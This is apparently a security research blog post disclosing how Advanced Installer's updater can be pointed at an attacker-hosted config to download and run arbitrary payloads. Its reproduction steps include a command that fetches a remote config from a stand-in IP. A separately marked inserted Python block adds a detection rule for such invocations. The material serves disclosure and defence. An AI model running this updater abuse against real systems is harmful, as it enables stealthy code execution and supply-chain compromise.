Howler Cell

Bring Your Own Updates (BYOU): Abusing Advanced Installer Updaters for Stealthy Code Execution

Written by Reegun Jayapaul | November 4, 2025 9:03:06 PM Z

Summary

The Howler Cell team has identified a recurring weakness in how Windows applications handle software updates. This technique, which we call Bring Your Own Updates (BYOU), allows attackers to hijack trusted updaters to execute arbitrary code quietly after gaining initial access. Because the binaries are signed, the paths are trusted, and the behavior appears normal, this abuse often evades traditional security controls.

This blog demonstrates how Advanced Installer, an application and deployment tool used by many of the largest organizations in the world, can be leveraged to infect remote computers with malware, potentially leading to a devastating supply-chain attack.

Key Findings

  • Howler Cell identified a significant security risk in Advanced Installer v22.7, enabling threat actors to exploit its update mechanism to execute malicious external code if the update packages are not digitally signed. By default, and in common practice, they are not digitally signed.
  • Because of Advanced Installer's popularity, the issue poses a major supply chain risk. Customers include Apple, Microsoft, Motorola, and many more of the largest global companies.
  • The exploit pathway, BYOU, lets adversaries run malicious code through legitimate updaters. Commands can bypass EDR (Endpoint Detection & Response) security, antivirus, and application control by leveraging signed binaries.
  • Dozens of signed update clients across assessed environments support flexible options such as -url or -config, often pulling files from HTTP endpoints or network shares without integrity checks, enabling malicious packages to be pulled and installed from an attacker’s network infrastructure.
  • Any software package created with vulnerable installer frameworks may be affected, making the issue potentially widespread, comparable in scope to supply chain incidents like SolarWinds.
  • Howler Cell reported the issue to Advanced Installer. The vendor acknowledged the issue and clarified that enabling the “Install only digitally signed update packages signed with the same certificate as the Updater” option would mitigate the risk. It should be noted that digitally signed updates are not enabled by default, and even Advanced Installer itself does not use them for its own updates. Howler Cell has not comprehensively reviewed how often digital signatures are used with Advanced Installer, but in the sampling of binaries we have tested, digital signatures were not enabled.
  • We believe this is not an isolated case. Multiple components in the software supply chain are likely exposed to similar BYOU-style attacks.

Abusing Update Mechanisms In Advanced Installer

This blog describes an attack pathway that abuses the update mechanism of Advanced Installer v22.7 (released May 2025) to achieve arbitrary code execution.

Advanced Installer is an application packaging and deployment tool used to create installation packages (MSI, EXE, MSIX, APPX) for software products. It provides a graphical interface that simplifies building installers without requiring deep knowledge of Windows Installer (MSI) technology. Developers use it to bundle application files, dependencies, registry entries, services, drivers, and configuration settings into a single installer that can be easily deployed and managed across systems. Advanced Installer is used by many of the largest corporations in the world.

Who's Impacted?

Advanced Installer’s customer page shows Apple, Microsoft, Motorola, and many other major organizations, shown in Figure 1, as customers. Organizations that do not use digitally signed updates remain exposed to this type of attack. We cannot confirm which ones fall into this category, but individual testing has demonstrated that the lack of digital signatures is a common practice.

The enforcement of digital signatures for updates is not mandatory when building installers with Advanced Installer. By default, the updater accepts unsigned packages, creating a direct exploitation path.

Who's Vulnerable?

  • Any vendor using default settings (no signature enforcement).
  • Even Advanced Installer’s own updater is vulnerable; it does not enforce digitally signed updates by default.

Real-World Scenario
Any internal enterprise software built with Advanced Installer inherits this weakness if its updates are not digitally signed. As the customer list below (Figure 1) demonstrates, the pool of potentially affected companies is massive.

Prevalence?
No exact ratio is available, since verifying every vendor's configuration is tedious. But defaults win: because signature enforcement is opt-in, most non-hardened deployments are exposed. The fact that Advanced Installer's own setup skips this mitigation speaks volumes.

Bottom Line: This is a systemic supply chain misconfiguration, not a niche bug. We recommend auditing all updaters built with Advanced Installer and enforcing digitally signed packages when publishing updates.

Figure 1 Advanced Installer Customers

What's the Impact?

This technique allows arbitrary code execution under the context of the user running the updater. It does not require prior authentication or elevated privileges to trigger. It can be leveraged in post-exploitation scenarios by an insider or threat actor with initial access to:

  • Maintain persistence via trusted update channels
  • Execute malicious code that may evade EDR or AV because of exclusions tied to the normally trusted update process
  • Abuse signed binaries and legitimate tooling to bypass application control mechanisms

Software packages built by Advanced Installer without enforcing digital signature checks will be indirectly exposed to this risk.

The clear concern with this attack is that it could be a vector for a massive supply chain disruption. A supply-chain attack occurs when adversaries compromise a trusted vendor or service—such as a software provider, hardware manufacturer, or cloud platform—to infiltrate their customers. Instead of targeting each organization directly, attackers inject malicious code or components into legitimate updates or products, spreading the compromise widely and stealthily.

These attacks are especially dangerous because they exploit trust and scale: a single poisoned update from a widely used tool (for example, an installer or build tool like Advanced Installer) can silently distribute signed, trusted malware to countless global companies, causing broad data theft, operational outages, regulatory penalties, and severe reputational damage across many sectors.

Technical Analysis

This malicious technique is achieved via an attacker-controlled update configuration file. The updater binary (updater.exe) accepts remote configuration files without authentication or validation, allowing an attacker to supply a crafted updater config file that includes a reference to a malicious payload. Once the payload is confirmed via the UI, it is downloaded and executed on the target system.

The updater tool (updater.exe) in Advanced Installer accepts a -url parameter that specifies the location of an update configuration file. If this file is hosted remotely and contains valid fields such as payload URL, file size, and checksum, updater.exe will process it.

By crafting a malicious configuration file that references a remote executable payload, an attacker can:

  • Trick the updater into presenting the update as legitimate.
  • Download and execute arbitrary binaries from an external source.
  • Bypass traditional defenses or application controls by abusing the trusted update process.

Steps to Reproduce - Binary Exploitation

  • Create a malicious update configuration file (e.g., exploit.txt) shown in Figure 2, that includes:
    • A URL field pointing to a remote payload (e.g., .exe)
    • File size and hash fields that match the malicious file
  • Host the configuration file on a remote server
    • Example: remote updater config URL: http://192.168.1.2/exploit.txt
  • Execute the following command on a system with Advanced Installer installed.

updater.exe /checknow -url http://192.168.1.2/exploit.txt

Figure 2 Updater config example (exploit.txt)
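As an added illustration that is not code from the Howler Cell post or from Advanced Installer, the following Python prototypes a detection rule for the invocation shown above: it scans process-creation events for updater.exe launched with a -url or -config argument that points at plaintext HTTP, a raw IP literal, a network share, or a host outside an allowlist of approved update origins (it generalizes the single command above to the -config and network-share cases mentioned in the key findings). The event field names, the allowlist host and the sample events are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts your vendors publish update configs from (assumption).
ALLOWED_UPDATE_HOSTS = {"updates.example-vendor.com"}
# -url / -config are the switch names from the write-up; everything else here is constructed.
ARG_RE = re.compile(r"(?i)(?:^|\s)-(url|config)\s+(\S+)")

def classify_updater_invocation(cmdline: str) -> list:
    """Reasons a command line looks like BYOU abuse; an empty list means nothing tripped."""
    reasons = []
    for flag, target in ARG_RE.findall(cmdline):
        target = target.strip('"')
        if target.startswith("\\\\"):  # UNC share: config fetched with no transport integrity
            reasons.append(f"-{flag} points to a network share: {target}")
            continue
        parsed = urlparse(target)
        host = parsed.hostname or ""
        if parsed.scheme.lower() == "http":
            reasons.append(f"-{flag} fetches the config over plaintext HTTP: {target}")
        if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
            reasons.append(f"-{flag} host is a raw IP literal: {host}")
        if host and host not in ALLOWED_UPDATE_HOSTS:
            reasons.append(f"-{flag} host is not an approved update origin: {host}")
    return reasons

def scan_process_events(events: list) -> list:
    """events: dicts with 'Image' and 'CommandLine' (the shape of 4688 / Sysmon EID 1 data).
    Returns [(command_line, reasons)] for each updater.exe launch that tripped a check."""
    hits = []
    for ev in events:
        if ev["Image"].lower().endswith("updater.exe"):
            reasons = classify_updater_invocation(ev["CommandLine"])
            if reasons:
                hits.append((ev["CommandLine"], reasons))
    return hits

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Vendor\updater.exe",
     "CommandLine": r'"C:\Program Files\Vendor\updater.exe" /checknow -url https://updates.example-vendor.com/updates.txt'},
    {"Image": r"C:\Program Files\Vendor\updater.exe",
     "CommandLine": "updater.exe /checknow -url http://192.168.1.2/exploit.txt"},
    {"Image": r"C:\Program Files\Vendor\updater.exe",
     "CommandLine": r"updater.exe /checknow -config \\fileshare\public\update.cfg"},
]

if __name__ == "__main__":
    print(scan_process_events(SAMPLE_EVENTS))
```

The first sample event (HTTPS to an approved host) produces no findings, so the rule stays quiet on the vendor's legitimate update check while flagging the two remote-origin variants.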

Proof of Concept Video

Responsible Disclosure From Cyderes

We responsibly disclosed this issue to Advanced Installer. Their team responded promptly and informed us that if signed update channels are used, the issue cannot be exploited. However, at the time of our testing, Advanced Installer’s setup was prone to this exploitation technique, and any software not using signed update channels remains affected.
